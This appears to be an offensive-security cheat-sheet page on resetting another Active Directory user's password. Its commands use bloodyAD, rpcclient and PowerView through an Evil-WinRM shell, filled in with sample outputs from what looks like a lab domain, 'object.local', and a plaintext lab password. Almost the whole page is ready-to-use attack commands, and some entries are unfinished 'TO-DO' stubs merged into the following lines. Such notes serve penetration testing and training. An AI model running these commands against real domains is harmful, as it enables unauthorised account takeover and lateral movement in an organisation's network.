Usage Tips:
- Click on a keyword to enable inline editing.
- Click inside a code block to copy (excludes comments).
- Use the button to view examples.
- Click outside to collapse all examples.
Change Target User Password (From Linux)
# Password
bloodyAD -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' --host <DC> set password '<TARGET_USER>' '<NEW_PASSWORD>'
Sample Output:
bloodyAD -d object.local -u oliver -p 'c1cdfun_d2434' --host jenkins.object.local set password smith 'Test1234'
[+] Password changed successfully!
# NTLM
bloodyAD -d <DOMAIN> -u '<USER>' -p ':<HASH>' -f rc4 --host <DC> set password '<TARGET_USER>' '<NEW_PASSWORD>'
Sample Output:
TO-DORef: bloodyAD
rpcclient -U '<DOMAIN>/<USER>%<PASSWORD>' <TARGET> -c 'setuserinfo2 <TARGET_USER> 23 <NEW_PASSWORD>'
Sample Output:
$ rpcclient -U 'object.local/oliver%c1cdfun_d2434' 10.10.11.132 -c 'setuserinfo2 smith 23 Test1234'
Change Target User Password (From Windows)
1. Import PowerView
. .\PowerView.ps1
Sample Output:
*Evil-WinRM* PS C:\programdata> . .\PowerView.ps1
2. Create a Cred Object (runas) [Optional]
$username = '<DOMAIN>\<USER>'
Sample Output:
TO-DO$password = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
Sample Output:
TO-DO$cred = new-object -typename System.Management.Automation.PSCredential -argumentlist $username, $password
Sample Output:
TO-DO3. Change Target User Password
$password = ConvertTo-SecureString '<NEW_PASSWORD>' -AsPlainText -Force
Sample Output:
*Evil-WinRM* PS C:\programdata> $password = ConvertTo-SecureString 'Test1234' -AsPlainText -Force
Set-DomainUserPassword -Identity <TARGET_USER> -AccountPassword $password -Credential $Cred
Sample Output:
*Evil-WinRM* PS C:\programdata> Set-DomainUserPassword -Identity gibdeon -AccountPassword $password